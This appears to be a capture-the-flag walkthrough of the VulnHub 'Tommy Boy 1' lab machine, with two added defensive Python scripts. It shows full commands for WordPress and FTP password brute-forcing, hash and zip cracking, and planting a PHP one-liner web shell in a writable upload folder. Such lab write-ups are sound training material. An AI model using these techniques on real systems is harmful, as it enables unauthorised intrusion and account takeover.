https://www.vulnhub.com/entry/tommy-boy-1,157/
Reconnaissance
└─$ sudo nmap -sn 192.168.45.0/24
Nmap scan report for 192.168.45.124
Host is up (0.00036s latency).
MAC Address: 08:00:27:C0:50:B6 (Oracle VirtualBox virtual NIC)
This one feels like it's going to be mostly web hacking.
HTTP - 80, 8008
First, let's try port 80.
It says the system had an error. Nick..
Here's the information left as comments in the page source.
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal. Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget? Thanks-->
The backup is in Tom's home directory, and Tom has been storing some important information on the company blog.
And they made a directory named after the place of the big fight; there's a YouTube link too.
The place, confirmed from the YouTube video.
/prehistoricforest
Next I check /robots.txt.
Every directory contains pictures; nothing else of note.
And the first flag. Apparently there are 5.
1/5 - B34rcl4ws
Now let's try port 8008.
Nothing special on the port 8008 website for now.
Vulnerability
First, directory brute-forcing with gobuster and a scan for potential vulnerabilities with nikto.
80
The directory brute-force printed only 200 responses because every entry from the wordlist came back as a 301, and nikto gave the same result. So I visited directly.
Every directory is set up like this.
So let's first go into the /prehistoricforest path from the earlier clue.
Oho, it's a Callahan employee blog built on WordPress.
Use wpscan to get user info and take a look around the blog.
#username
tommy
richard
tom
Tom Jr.
Big Tom
michelle
And remember it said a lot of important information gets put on the blog? And the thing in the /richard directory is supposed to jog the memory... so I download it and take a look.
2/5 - Z4l1nsky
Running strings on it, something looks suspicious, right?
It looks like a hash, so let's identify it and crack it; this time I used hashcat.
└─$ hashcat -m 0 -a 0 -O hash.txt /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ce154b5a8e59c89732bc25d6a2e6b90b:spanky
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: ce154b5a8e59c89732bc25d6a2e6b90b
Time.Started.....: Wed Jul 17 17:49:49 2024 (1 sec)
Time.Estimated...: Wed Jul 17 17:49:50 2024 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 313.3 kH/s (0.27ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1536/14344385 (0.01%)
Rejected.........: 0/1536 (0.00%)
Restore.Point....: 1024/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: kucing -> mexico1
Hardware.Mon.#1..: Util: 60%
ce154b5a8e59c89732bc25d6a2e6b90b:spanky
Michelle/Tommy,
This is f’d up.
I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:
Hey Richy,
So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.
Here’s everything I know:
You guys are all hopeless sheep :-/
The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.
I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).
You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.
Good luck, schmucks!
LOL
-Nick
Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!
-Richard
Hmm... first, I need to use SSH as the Big Tom account.
Nick's home directory holds other information.
Renaming the backup file callahanbak.bak to index.html should make the site work normally.
There's an unstable FTP server: available for 15 minutes at the top of each hour, then offline for 15 minutes.
And the nickburns account was reset to a very easy password...
Using wpscan again, I run a password brute-force.
└─$ wpscan --url http://192.168.45.124/prehistoricforest/ -U wp_user.txt -P /usr/share/wordlists/rockyou.txt
Exploitation
Let's log in as the tom user.
Right after logging in, there's a post titled password in Drafts.
# Credentials
tom(?):1938!!
I have tom's password, but the letter earlier said the username differs from the name he actually uses.
So,, the other approach is to use FTP; I port-scan again with nmap.
Looks like it's port 65534.
It said he uses a simple password, so I write up a short list.
└─$ cat ftp_pw.txt
password
pass
password123!
nick
nickburns
Then I run a password spraying attack with hydra.
There's not much time!!
# Credentials
nickburns:nickburns
└─$ ftp 192.168.45.124 65534
Connected to 192.168.45.124.
220 Callahan_FTP_Server 1.3.5
Name (192.168.45.124:kali): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||26591|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 nickburns nickburns 977 Jul 15 2016 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||43711|)
150 Opening BINARY mode data connection for readme.txt (977 bytes)
100% |****************************************************************************************************************| 977 16.13 KiB/s 00:00 ETA
226 Transfer complete
977 bytes received in 00:00 (15.67 KiB/s)
└─$ cat readme.txt
To my replacement:
If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!
Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.
Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what?
He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet.
Good luck, schmuck!
LOL.
-Nick
There's a directory called NickIzL33t somewhere on the server, and because Big Tom always forgets his passwords, they were put in an encrypted .zip.
Still the same here...
Since it mentions Steve Jobs, I use a proxy tool to change the User-Agent to iOS and try again.
Haha, I only found a hint to look for an .html extension.
So I need to find something; I'll use ffuf, which has an option to change the user-agent.
└─$ ffuf -u http://192.168.45.124:8008/NickIzL33t/FUZZ.html -w /usr/share/wordlists/rockyou.txt -H "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3"
...
#1shorty [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 7ms]
#1monkey [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 0ms]
#1nigga [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 13ms]
#1babygurl [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 23ms]
fallon1 [Status: 200, Size: 459, Words: 56, Lines: 13, Duration: 38ms]
#1balla [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 6ms]
#1mother [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 13ms]
#1freak [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 13ms]
#1playa [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 16ms]
....
One of them is different from the rest, right?
Now almost all the hints have been given.
Big Tom,
Your password vault is protected with (yep, you guessed it) a PASSWORD!
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!
Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:
* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters
Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one
big chunk ok? Heh, "big chunk." A big chunk typing big chunks. That's funny.
LOL
-Nick
3/5 - TinyHead
A password is needed to extract the archive, and the hint is in the letter above.
└─$ unzip t0msp4ssw0rdz.zip
Archive: t0msp4ssw0rdz.zip
[t0msp4ssw0rdz.zip] passwords.txt password:
Tom's wife's nickname bev
1 uppercase letter,
2 lowercase letters,
2 digits,
1 symbol,
and the year Tommy Boy came out -> 1995
└─$ crunch 13 13 -t bev,%%@@^1995 -o unzip_pw.txt
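As an added example, not part of the original walkthrough, here is what the hint sheet actually does to that "13 characters baby!" policy. Once the structure is known (fixed prefix, one uppercase, two digits, two lowercase, one symbol, fixed year), the space crunch has to enumerate is tiny compared with a free 13-character password. The symbol set below is an assumption (Python's string.punctuation, 32 characters; crunch's own default symbol charset differs slightly), so the count is an estimate of what the crunch -t pattern on the page generates.

```python
"""Keyspace of a password policy whose structure is known.

Added example, not part of the original walkthrough. The policy is the one in
Nick's hint sheet: "bev" + 1 uppercase + 2 digits + 2 lowercase + 1 symbol +
"1995". The symbol set is an assumption (string.punctuation, 32 characters;
crunch's default symbol charset differs slightly).
"""
import itertools
import math
import re
import string

PREFIX = "bev"
SUFFIX = "1995"
# One entry per variable slot, in the order crunch -t bev,%%@@^1995 uses.
SLOTS = [
    string.ascii_uppercase,                          # one uppercase
    string.digits, string.digits,                    # two digits
    string.ascii_lowercase, string.ascii_lowercase,  # two lowercase
    string.punctuation,                              # one symbol (assumed set)
]

# Regex form of the same policy, used to validate a candidate.
POLICY_RE = re.compile(
    r"^bev[A-Z][0-9]{2}[a-z]{2}[" + re.escape(string.punctuation) + r"]1995$"
)


def matches_policy(candidate: str) -> bool:
    """True if the candidate is one of the strings the policy permits."""
    return POLICY_RE.match(candidate) is not None


def keyspace_size() -> int:
    """Number of distinct passwords the structured policy allows."""
    size = 1
    for charset in SLOTS:
        size *= len(charset)
    return size


def effective_bits(size: int) -> float:
    """Entropy in bits if every allowed candidate were equally likely."""
    return math.log2(size)


def naive_bits(length: int = 13, alphabet: int = 95) -> float:
    """Bits a 13-character password would carry if all 95 printable ASCII
    characters were free in every position, i.e. what the policy advertises."""
    return length * math.log2(alphabet)


def generate(limit: int):
    """Yield the first `limit` candidates in the same slot order as the
    crunch pattern (prefix, upper, digit, digit, lower, lower, symbol, suffix)."""
    for n, combo in enumerate(itertools.product(*SLOTS)):
        if n >= limit:
            return
        yield PREFIX + "".join(combo) + SUFFIX


if __name__ == "__main__":
    size = keyspace_size()
    print(f"policy keyspace : {size:,} candidates (~{effective_bits(size):.1f} bits)")
    print(f"advertised      : ~{naive_bits():.1f} bits for 13 free printable chars")
    print("first candidates:", list(generate(3)))
    print("bevH00tr$1995 fits the policy:", matches_policy("bevH00tr$1995"))
```

The gap between the two numbers (about 26 bits versus about 85) is the whole story of this step: a length rule enforced with a published pattern is a short list, not a strong password, and the found value bevH00tr$1995 is just one entry in it.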
Password list created; to crack the zip's password I'll use a tool called fcrackzip.
While the tool is running, thinking again about what I'm actually doing:
I need to SSH in as Big Tom. I got the password from WordPress, but since the account wasn't created with a regular username, the user exists under a name different from the blog's, so I'm currently looking for that username.
# Credentials
tom(?):1938!!
└─$ fcrackzip -v -u -D -p unzip_pw.txt ./t0msp4ssw0rdz.zip
found file 'passwords.txt', (size cp/uc 332/ 641, flags 9, chk 9aad)
checking pw bevG72kn~1995
PASSWORD FOUND!!!!: pw == bevH00tr$1995
└─$ unzip t0msp4ssw0rdz.zip
Archive: t0msp4ssw0rdz.zip
[t0msp4ssw0rdz.zip] passwords.txt password:
inflating: passwords.txt
┌──(kali㉿kali)-[~/vulnhub/tommyboy]
└─$ cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money
TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding
Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat
Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.
Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
What I need is the Auto Server username.
Combine it with 1938!! and try SSH.
bigtommysenior:fatguyinalittlecoat1938!!
Initial access to the target host complete
Finally, Big Tom,, taken over
Post-Exploitation
bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.
Flag data: EditButton
But...but...where's flag 5?
I'll make it easy on you. It's in the root of this server at /5.txt
4/5 - EditButton
The 5th flag is supposedly at /5.txt.
Earlier it said that copying the backup file to /var/www/html/index.html would get the website running normally, so let's try that.
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak el-flag-numero-quatro.txt LOOT.ZIP
bigtommysenior@CallahanAutoSrv01:~$ ls -al /var/www/html/index.html
-rw-r--r-- 1 bigtommysenior bigtommysenior 1176 Jul 8 2016 /var/www/html/index.html
bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html
The website is back to normal,, hmm,, now I need to find a file, directory, or something else usable on the target host.
bigtommysenior@CallahanAutoSrv01:~$ find / -perm -222 -type d 2> /dev/null
/var/lib/php/sessions
/var/crash
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
/var/tmp
/dev/mqueue
/dev/shm
/run/lock
/tmp
/tmp/.XIM-unix
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.X11-unix
It's a directory I can write to,, so I create a PHP one-liner shell.
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ echo '<?php system($_GET['c']); ?>' > one.php
Finding a writable directory made Remote Code Execution possible too.
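The find / -perm -222 -type d step above answers the attacker's question; the defender's version of the same question is which directories under a served tree any local user can write to, and whether any of them already hold server-side scripts. The audit script below is an added example, not part of the original walkthrough or the box; it builds a constructed sample tree in a temp directory (mirroring the html/ and uploads/ layout seen on this host) so it runs offline, then walks it the way a cron job or CI check over a real web root would.

```python
"""Audit a web root for world-writable directories and the scripts inside them.

Added example, not part of the original walkthrough. The sample tree is
constructed in a temp directory so the script runs offline; point
audit_webroot() at a real document root to use it for real.
"""
import os
import stat
import tempfile

# Extensions the web server would execute if dropped into a writable folder.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar"}


def is_world_writable(path: str) -> bool:
    """True if the 'other' write bit is set on the path's mode."""
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def audit_webroot(root: str) -> list:
    """Walk `root` and report every world-writable directory, with the
    sticky-bit state and any server-side script files directly inside it."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if not is_world_writable(dirpath):
            continue
        scripts = sorted(
            f for f in filenames
            if os.path.splitext(f)[1].lower() in SCRIPT_EXTS
        )
        findings.append({
            "dir": os.path.relpath(dirpath, root),
            "sticky": bool(os.lstat(dirpath).st_mode & stat.S_ISVTX),
            "scripts": scripts,
        })
    return findings


def build_sample_tree() -> str:
    """Constructed sample: a web root with one locked-down directory and one
    world-writable uploads directory that already holds a .php file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    safe = os.path.join(root, "html")
    mid = os.path.join(root, "NickIzL33t", "P4TCH_4D4MS")
    uploads = os.path.join(mid, "uploads")
    os.makedirs(safe)
    os.makedirs(uploads)
    with open(os.path.join(safe, "index.html"), "w") as fh:
        fh.write("<html></html>\n")
    with open(os.path.join(uploads, "one.php"), "w") as fh:
        fh.write("<?php /* constructed placeholder, not a real shell */ ?>\n")
    with open(os.path.join(uploads, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")
    # Pin modes explicitly so the result does not depend on the umask.
    os.chmod(safe, 0o755)
    os.chmod(os.path.join(root, "NickIzL33t"), 0o755)
    os.chmod(mid, 0o755)
    os.chmod(uploads, 0o777)  # the misconfiguration being audited
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for f in audit_webroot(root):
        state = "SCRIPTS PRESENT" if f["scripts"] else "empty"
        print(f"world-writable: {f['dir']} sticky={f['sticky']} [{state}] {f['scripts']}")
```

A writable upload directory is sometimes unavoidable; the fix that removes this step of the walkthrough is to keep it outside the document root or to configure the web server so nothing in it is executed as code, and the script's "SCRIPTS PRESENT" line is what should never appear on a healthy host.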
5/5 - Buttcrack
Putting all 5 flags together,,, time to open the last remaining file.
B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
Yes... this one really gave me a headache,,, haha